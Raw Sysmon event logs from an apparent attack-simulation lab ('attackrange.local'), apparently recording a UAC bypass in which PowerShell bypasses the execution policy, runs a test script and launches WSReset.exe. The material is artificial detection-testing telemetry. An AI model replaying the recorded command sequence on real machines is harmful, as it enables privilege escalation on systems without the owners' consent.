08:04:22.874{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.874{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.874{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.874{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001053281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.866{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\ws.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001053280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.024{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=283F93CB067D7125381930C81E78BFB8,SHA256=493388FCA9A155E9E100D97883BE27FEE2E59633CCF28C139218A2DEB5F6A380,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:23.151{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAD091C326B9E006687119551E4638CF,SHA256=9C2FFE1567B433EBBCB6A7865AE2A0227A165C1FCD632ED8834D7F6EA8A67F29,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.965{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.965{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.965{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.950{466BC892-02AD-60E8-0A00-00000000CF01}6162696C:\Windows\system32\services.exe{466BC892-F787-60EB-CE7D-00000000CF01}9968C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.950{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F787-60EB-CE7D-00000000CF01}9968C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001053347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:14.766{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61921-false10.0.1.12-8000- 10341000x80000000000000001053346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.931{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F787-60EB-CE7D-00000000CF01}9968C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.930{466BC892-02AD-60E8-0A00-00000000CF01}6163760C:\Windows\system32\services.exe{466BC892-F787-60EB-CE7D-00000000CF01}9968C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.912{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.912{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.912{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.912{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.865{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F787-60EB-CD7D-00000000CF01}9664C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.865{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F787-60EB-CD7D-00000000CF01}9664C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.850{466BC892-F787-60EB-CD7D-00000000CF01}966410204C:\Windows\system32\conhost.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.850{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F787-60EB-CD7D-00000000CF01}9664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.834{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.834{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.834{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.834{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.834{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.834{466BC892-F786-60EB-CA7D-00000000CF01}95087676Shell.Commands.ManagWindowsPowerShell\v1.0\powershell.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\shell32.dll+3cdcf|C:\Windows\System32\shell32.dll+3cc5c|C:\Windows\System32\shell32.dll+3c9ac|C:\Windows\System32\shell32.dll+122467|C:\Windows\System32\shell32.dll+1223c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+38b30c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+af11c7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64) 154100x80000000000000001053330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.842{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\System32\WSReset.exe10.0.14393.4169 (rs1_release.210107-1130)This tool resets the Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\system32\WSReset.exe" C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=5181342124A0AB97F865A39581CE9C41,SHA256=FE7AF6AC7EA79AEA47BFF06035875DD1975590F78C31797526908C1A4877EE84,IMPHASH=279E04CF32068F56394D78D663C285A4{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" 